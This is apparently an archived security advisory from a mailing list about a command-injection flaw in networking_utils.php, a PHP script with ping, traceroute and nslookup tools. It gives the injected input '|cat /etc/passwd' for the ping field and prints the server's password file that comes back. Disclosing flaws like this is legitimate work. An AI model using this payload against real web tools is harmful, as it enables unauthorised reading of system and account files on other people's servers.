Exploit for the utility networking_utils.php which does not properly sanitize variables from the client side and in turn will allow any remote visitor to view any file on the webserver.
f24477d4888f51dc4febd2bcdce740fd4c7df95c1dda5100eb5b595ac7970f9eTitle:
The bug in networking_utils.php
(http://www.sourcecraft.org/downloads)
networking_utils(PHP) Show Files Vulnerability
Summary:
networking_utils.php
Includes a ping function, a traceroute function, and
an nslookup function.
Vulnerable systems:
networking_utils
networking_utils.php of the networking_utils php
script allows remote visitors
to view any file on a webserver.
Example:
The command which is written to Domain name or Ip
address part(Ping Utility):
|cat /etc/passwd
by this command, password file to view in the web
browser.
Ping Results For : |cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
mysql:x:415:415:MySQL server:/var/lib/mysql:/bin/bash
cilek:x:501:501:cilek:/home/cilek:/bin/bash
avicenna:x:502:502:Avicenna:/home/avicenna:/bin/bash
__________________________________________________
Do you Yahoo!?
HotJobs - Search new jobs daily now
http://hotjobs.yahoo.com/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed